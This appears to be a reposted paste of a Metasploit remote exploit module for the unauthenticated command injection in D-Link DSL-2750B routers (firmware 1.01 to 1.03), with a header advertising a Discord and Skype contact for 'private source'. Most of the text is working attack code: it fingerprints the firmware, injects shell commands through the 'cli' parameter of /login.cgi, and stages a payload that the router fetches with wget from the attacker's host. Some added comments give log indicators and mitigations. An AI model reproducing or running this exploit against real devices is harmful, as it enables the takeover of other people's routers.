
[D-Link DSL-2750B EXPLOIT ][MS]

xB4ckdoorREAL Nov 7th, 2018 (edited) 106 Never
  1. ##DISCORD: https://discord.gg/QDy3bUy OR SKYPE: b4ckdoor.porn [for spots/private source and more.]
  2.  
  3. # This module requires Metasploit: https://metasploit.com/download
  4. # Current source: https://github.com/rapid7/metasploit-framework
  5. ##
  6.  
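  # Metasploit remote exploit module for the OS command injection in the
  # D-Link DSL-2750B web interface (firmware 1.01 up to 1.03 per the module
  # description).
  #
  # Root cause, as stated in the module metadata: the `cli` query parameter is
  # used directly to invoke the `ayecli` binary, so shell metacharacters placed
  # in it are run as commands on the router.
  #
  # Defender notes:
  # * Log indicator: GET /login.cgi requests whose `cli` parameter carries a
  #   single quote followed by `;` (see #execute_command).
  # * #check reads the firmware version from /ayefeaturesconvert.js without
  #   sending credentials, so the same request can be used to inventory
  #   affected devices.
  # * Keep the management web interface unreachable from untrusted networks and
  #   move off firmware 1.01 - 1.03 where a later release is available.
  class MetasploitModule < Msf::Exploit::Remote
    Rank = GreatRanking

    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::CmdStager

    # Registers module metadata (name, references, targets) with the framework.
    #
    # @param info [Hash] metadata supplied by the framework, merged via update_info
    def initialize(info = {})
      super(update_info(info,
        'Name'           => 'D-Link DSL-2750B OS Command Injection',
        'Description'    => %q(
          This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.
          Vulnerability can be exploited through "cli" parameter that is directly used to invoke
          "ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03.
        ),
        # 'Author' is the metadata key the framework reads; the paste used a
        # non-standard 'Author/Reposting' key, which left the module without
        # author information.
        'Author'         =>
          [
            'p@ql', # vulnerability discovery
            'b4',   # reposted this module
          ],
        'License'        => MSF_LICENSE,
        'References'     =>
          [
            ['PACKETSTORM', 135706],
            ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/53'],
            ['URL', 'http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/']
          ],
        'Targets'        =>
          [
            [
              'Linux mipsbe Payload',
              {
                'Arch' => ARCH_MIPSBE,
                'Platform' => 'linux'
              }
            ],
            [
              'Linux mipsel Payload',
              {
                'Arch' => ARCH_MIPSLE,
                'Platform' => 'linux'
              }
            ]
          ],
        'DisclosureDate'  => 'Feb 5 2016',
        'DefaultTarget'   => 0))

      # The stager flavor is fixed to :wget in #exploit, so the user-facing
      # option for it is removed.
      deregister_options('CMDSTAGER::FLAVOR')
    end

    # Fingerprints the device model and firmware version. Sends a single GET
    # for a static script file and no injection payload.
    #
    # @return [CheckCode] Unknown when there is no response or the connection
    #   fails, Safe when the host is not a DSL-2750 or reports a version
    #   outside 1.01..1.03, Appears when the version is inside that range.
    def check
      res = send_request_cgi(
        'method' => 'GET',
        'uri' => '/ayefeaturesconvert.js'
      )

      unless res
        vprint_error('Connection failed')
        return CheckCode::Unknown
      end

      unless res.code.to_i == 200 && res.body.include?('DSL-2750')
        vprint_status('Remote host is not a DSL-2750')
        return CheckCode::Safe
      end

      # The dot is escaped so that only a literal "major.minor" value is
      # accepted; the unescaped form matched any character in that position.
      if res.body =~ /var AYECOM_FWVER="(\d\.\d+)";/
        version = Regexp.last_match(1)
        vprint_status("Remote host is a DSL-2750B with firmware version #{version}")
        # String (lexicographic) comparison, which orders the "N.NN" shaped
        # values of the affected range correctly.
        return CheckCode::Appears if version.between?('1.01', '1.03')
      end

      CheckCode::Safe
    rescue ::Rex::ConnectionError
      vprint_error('Connection failed')
      CheckCode::Unknown
    end

    # CmdStager callback: sends one staged command line through the `cli`
    # parameter of /login.cgi.
    #
    # @param cmd [String] command line produced by the command stager
    # @param _opts [Hash] unused
    # @return the result of send_request_cgi; a connection error ends the
    #   module run through fail_with(Failure::Unreachable, ...)
    def execute_command(cmd, _opts)
      # The `multilingual show'` prefix, the `;` separator and the quotes are
      # what a web or proxy log would show (URI-encoded) for this request.
      payload = Rex::Text.uri_encode("multilingual show';#{cmd}'")
      send_request_cgi(
        {
          'method' => 'GET',
          'uri' => '/login.cgi',
          'vars_get' => {
            # NOTE(review): the trailing `$` is appended after encoding; its
            # purpose is not evident from this file.
            'cli' => "#{payload}$"
          },
          # The value was URI-encoded above, so it must not be encoded again.
          'encode_params' => false
        },
        5 # response timeout in seconds
      )
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
    end

    # Module entry point: stops with Failure::NotVulnerable unless #check
    # reports Appears, then hands over to the command stager.
    def exploit
      print_status("#{peer} Checking target version...")

      unless check == CheckCode::Appears
        fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
      end

      # The :wget flavor makes the device fetch the payload itself, so an
      # unexpected outbound HTTP download from the router is an observable
      # side effect. linemax caps the length of each staged command line.
      execute_cmdstager(
        flavor: :wget,
        linemax: 200
      )
    end
  end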
  116.  
  117. # [2018-11-07]